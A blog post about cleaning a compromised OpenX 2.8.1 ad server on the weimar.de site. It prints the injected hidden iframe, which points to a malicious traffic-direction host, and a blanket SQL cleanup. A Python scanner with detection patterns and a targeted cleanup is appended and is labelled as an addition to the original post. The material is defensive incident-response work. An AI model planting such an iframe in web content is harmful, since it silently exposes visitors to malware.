OpenX – security problem with malware hack

It hit me cold when I saw the virus scanner's red warning jump onto the screen. Administering www.weimar.de, it is no fun having a virus warning on the front page of an official website.

The cause was OpenX version 2.8.1, which I updated to 2.8.5, which seemed too late, since the database was already affected. I found this code within my banner JS:

<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>

I checked all PHP files, or rather the three most important ones:

  • /var/yourdomain.conf.php
  • /adjs.php
  • /www/delivery/ajs.php

and found nothing. Check them anyway, because in some cases the hack is injected directly into those files (at the very beginning or the end).

So I checked my database, the table phpads_banners (or openx_banners, depending on your table prefix), and found nothing obvious. The malicious code is hidden within the BLOB fields, whose contents phpMyAdmin only shows if BLOB display is enabled, so there is one thing you can do: empty these fields:

  • prepend
  • append
  • htmltemplate
  • htmlcache

I rigorously cleared out all the sh*t with this simple statement:

UPDATE `my_db`.`phpads_banners` SET `append` = NULL,`prepend` = NULL,`htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;
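The file and database checks above, as an added example that is not code from the original post: a Python script that undoes the `"<"+"iframe"` string-splitting seen in the injected banner JS before matching, checks only the head and tail of a PHP file as suggested above, and runs the scan plus a targeted variant of the UPDATE against a constructed SQLite stand-in for phpads_banners with the same four column names. The sample rows, the 512-byte edge window and the list of marker patterns are assumptions, not data from the affected site.

```python
import re
import sqlite3

# Columns of the phpAdsNew / OpenX banners table that carried the payload.
BANNER_FIELDS = ("prepend", "append", "htmltemplate", "htmlcache")

# Assumed marker list: the 1x1 iframe, the TDS redirector path from the post,
# script tags, and the usual PHP obfuscation calls seen in file-level injections.
SUSPICIOUS = re.compile(
    r"<iframe\b|in\.cgi\?|<script\b|eval\s*\(\s*(base64_decode|gzinflate|str_rot13)",
    re.IGNORECASE,
)


def normalize(value):
    """Undo JS escaping and the '<"+"iframe' string-splitting trick so a plain
    regex sees the real markup. None (an empty BLOB) becomes ""."""
    if value is None:
        return ""
    text = value.decode("utf-8", "replace") if isinstance(value, bytes) else str(value)
    text = text.replace('\\"', '"').replace("\\/", "/")
    return re.sub(r'"\s*\+\s*"', "", text)  # "foo"+"bar" -> foobar


def find_hits(value):
    """Suspicious fragments found in one field value (empty list if clean)."""
    return [m.group(0) for m in SUSPICIOUS.finditer(normalize(value))]


def php_file_edges_suspicious(source, edge_bytes=512):
    """File-level injections sit at the very beginning or end of the PHP file,
    so only those edges are inspected (edge size is an assumption)."""
    text = normalize(source)
    return bool(SUSPICIOUS.search(text[:edge_bytes]) or SUSPICIOUS.search(text[-edge_bytes:]))


def open_sample_db():
    """Constructed stand-in for the MySQL table: SQLite, same column names,
    so the statements below transfer to MySQL apart from the schema prefix."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE phpads_banners (bannerid INTEGER PRIMARY KEY, description TEXT, "
        "prepend BLOB, append BLOB, htmltemplate BLOB, htmlcache BLOB)"
    )
    rows = [  # constructed sample rows
        (1, "clean image banner", None, None, None, None),
        (2, "legitimate html banner", None, None, "<a href='http://example.org/'>Example</a>", None),
        # Copy of the injected string from the post, as it sat in the BLOB field.
        (3, "infected banner", None,
         b'<"+"iframe src=\\"http://194.8.250.211/tds/in.cgi?default\\" width=\\"1\\" height=\\"1\\"><"+"/iframe>',
         None, None),
        (4, "second infected banner", b"<script src='http://example.net/x.js'></script>", None, None, None),
    ]
    conn.executemany("INSERT INTO phpads_banners VALUES (?,?,?,?,?,?)", rows)
    return conn


def scan_banners(conn):
    """Map bannerid -> {field: [hits]} for every row that carries a payload."""
    cols = ", ".join(BANNER_FIELDS)
    infected = {}
    for bannerid, *values in conn.execute(f"SELECT bannerid, {cols} FROM phpads_banners"):
        hits = {f: h for f, v in zip(BANNER_FIELDS, values) if (h := find_hits(v))}
        if hits:
            infected[bannerid] = hits
    return infected


def clean_banners(conn, bannerids):
    """Targeted version of the post's UPDATE: NULL the four fields only on the
    flagged rows, so legitimate HTML banners survive. Returns rows changed."""
    ids = list(bannerids)
    if not ids:
        return 0
    placeholders = ", ".join("?" * len(ids))
    sets = ", ".join(f"{f} = NULL" for f in BANNER_FIELDS)
    cur = conn.execute(f"UPDATE phpads_banners SET {sets} WHERE bannerid IN ({placeholders})", ids)
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    db = open_sample_db()
    found = scan_banners(db)
    for bid, hits in found.items():
        print(f"banner {bid}: {hits}")
    print("rows cleaned:", clean_banners(db, found))
    print("remaining after cleanup:", scan_banners(db))
```

The targeted UPDATE only touches the rows the scan flagged, so a legitimate HTML banner (row 2 in the sample) keeps its htmltemplate; the `WHERE 1` statement above wipes those fields on every banner, which is harmless only if you serve no HTML banners. Against MySQL, swap the SQLite connection for your driver and keep the statements; the column names match the UPDATE on this page.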

Good luck!
